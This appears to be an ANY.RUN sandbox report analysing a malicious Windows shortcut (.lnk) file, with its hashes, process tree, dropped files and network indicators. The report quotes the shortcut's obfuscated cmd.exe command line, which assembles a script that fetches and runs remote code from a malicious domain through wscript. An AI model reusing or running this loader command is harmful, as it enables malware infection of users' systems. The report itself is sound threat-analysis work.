analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

OJ727249317BR.1014.lnk

Full analysis: https://app.any.run/tasks/109a6dda-d8a8-478b-8ba7-dc8b6cc65827
Verdict: Malicious activity
Analysis date: May 29, 2020, 20:33:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Sat Jul 16 12:18:09 2016, mtime=Sat Jul 16 12:18:09 2016, atime=Sat Jul 16 12:18:09 2016, length=202752, window=hidenormalshowminimized
MD5:

CC88CE579FC1C92392BFA3EA3ED5E459

SHA1:

6D20037095D79E864CA49BC487ACEE35AA05AB52

SHA256:

A9A2A291A18615EF77898392B892F09407DCB654DCEB9EEDA976C840B6088FF5

SSDEEP:

24:8yKJXBliE9YjQJBe+/21kb4aigebbXTEl46hhoTxh6cQ16NOdP5dAdQabfGPlwwa:8y0LiAJD4ngmXYl13oLpO55+ia7Gdw

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Runs app for hidden code execution

      • cmd.exe (PID: 2972)

    • Changes settings of System certificates

      • wscript.exe (PID: 2712)

  • SUSPICIOUS

    • Executes scripts

      • cmd.exe (PID: 3944)

    • Reads Internet Cache Settings

      • wscript.exe (PID: 2712)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2972)

    • Creates files in the user directory

      • wscript.exe (PID: 2712)

    • Adds / modifies Windows certificates

      • wscript.exe (PID: 2712)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, RelativePath, WorkingDir, CommandArgs, Unicode, ExpString
FileAttributes: Archive
CreateDate: 2016:07:16 15:18:09+02:00
AccessDate: 2016:07:16 15:18:09+02:00
ModifyDate: 2016:07:16 15:18:09+02:00
TargetFileSize: 202752
IconIndex: (none)
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: cmd.exe
DriveType: Fixed Disk
VolumeLabel: Windows
LocalBasePath: C:\Windows\System32\cmd.exe
RelativePath: ..\..\..\..\..\..\Windows\System32\cmd.exe
WorkingDirectory: %windir%\System32
CommandLineArguments: %ComSpec% /V/D/c "sET yhts=.j&&sET OGA=GIHWXUetIHWXUObjIHWXUecIHWXUt(IHWXU'sIHWXUcriIHWXUpt:IHWXUHTtIHWXUp:&&sET sj6edOJ=1HMUT1HMUTsc1lt5roa8t.jatuabajornal.com.de1HMUT?021HMUT')&&sEt/^p imvu8qk="%OGA:IHWXU=%%sj6edOJ:1HMUT=/%"<nul > %TMP%\eWHmis6%yhts%s|md ^\ ^||echo stArt %windir%\System32\wsCript.eXe %TMP%\eWHmis6%yhts%s|>nul >nul >nul >nul cmd"
MachineID: ns571774
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs wscript.exe

Process information

PID
CMD
Path
Indicators
Parent process
2972"C:\Windows\System32\cmd.exe" C:\Windows\system32\cmd.exe /V/D/c "sET yhts=.j&&sET OGA=GIHWXUetIHWXUObjIHWXUecIHWXUt(IHWXU'sIHWXUcriIHWXUpt:IHWXUHTtIHWXUp:&&sET sj6edOJ=1HMUT1HMUTsc1lt5roa8t.jatuabajornal.com.de1HMUT?021HMUT')&&sEt/^p imvu8qk="%OGA:IHWXU=%%sj6edOJ:1HMUT=/%"<nul > C:\Users\admin\AppData\Local\Temp\eWHmis6%yhts%s|md ^\ ^||echo stArt C:\Windows\System32\wsCript.eXe C:\Users\admin\AppData\Local\Temp\eWHmis6%yhts%s|>nul >nul >nul >nul cmd"C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3652C:\Windows\system32\cmd.exe /S /D /c" sEt/p imvu8qk="%OGA:IHWXU=%%sj6edOJ:1HMUT=/%" 0<nul 1>C:\Users\admin\AppData\Local\Temp\eWHmis6%yhts%s"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3752C:\Windows\system32\cmd.exe /S /D /c" md \ |"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3840C:\Windows\system32\cmd.exe /S /D /c" echo stArt C:\Windows\System32\wsCript.eXe C:\Users\admin\AppData\Local\Temp\eWHmis6%yhts%s"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3944cmdC:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2712C:\Windows\System32\wsCript.eXe C:\Users\admin\AppData\Local\Temp\eWHmis6.jsC:\Windows\System32\wscript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
Total events
3 634
Read events
73
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
3
Unknown types
1

Dropped files

PID
Process
Filename
Type
2712wscript.exeC:\Users\admin\AppData\Local\Temp\TarF3B5.tmp
MD5:
SHA256:
2712wscript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\9K45BE55.txt
MD5:
SHA256:
2712wscript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\YYIE5KV9.txt
MD5:
SHA256:
2712wscript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\7HCTY3WJ.txttext
MD5:55129733FF2C3DF868A3C1B16BDC5A7A
SHA256:028D691BF70B77F4738F4864AF5E1BDA525EAC7ED8EA5B8255A5D27976F2E3DF
3652cmd.exeC:\Users\admin\AppData\Local\Temp\eWHmis6.jstext
MD5:9598CF9BDD6634FBA6898D9BDAFAEA82
SHA256:4F2C6AF63243A304CB8BE019279469C1D513648841BF1080644BEB73322171B4
2712wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_33E8F98A524575FDD27708D6D61F97EDbinary
MD5:A750CBB8158DF05C5B30605FB755999A
SHA256:D57CFE00D07C64B4793257EFAAECE955FDB99A874BEC3E01D9DFD06AEFAF81D8
2712wscript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\UGIUMOXC.txttext
MD5:57D00B78869A4983E971A4E4BFE66FF9
SHA256:A77DF2FEA4E8625FE4829A98CCE87CADD549C76BE178F4BEBE207B1DD46BDF60
2712wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_33E8F98A524575FDD27708D6D61F97EDder
MD5:C50E97339538C6ACD3CE25D3210BCD1E
SHA256:F1128A2593AECE6126705F1201E9765997656159D3D340A12F84E866748A53C0
2712wscript.exeC:\Users\admin\AppData\Local\Temp\CabF3B4.tmpcompressed
MD5:767760B1B3B838B2DE0599D0E76D1C76
SHA256:C0F37380971FB93ECB0CFA3C2BD6D91CC77F254F0A6CA41EDEFF47FDA0E409CC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2712
wscript.exe
GET
302
104.27.180.193:80
http://sc1lt5roa8t.jatuabajornal.com.de/?02/
US
shared
2712
wscript.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAKXB1YM1Knrv%2BJy8eCW2II%3D
US
der
471 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2712
wscript.exe
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
2712
wscript.exe
104.17.209.9:443
www.cloudflare.com
Cloudflare Inc
US
shared
2712
wscript.exe
104.27.180.193:80
sc1lt5roa8t.jatuabajornal.com.de
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
sc1lt5roa8t.jatuabajornal.com.de
  • 104.27.180.193
  • 104.27.181.193
  • 172.67.151.140
unknown
www.cloudflare.com
  • 104.17.209.9
  • 104.17.210.9
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
OJ727249317BR.1014.lnk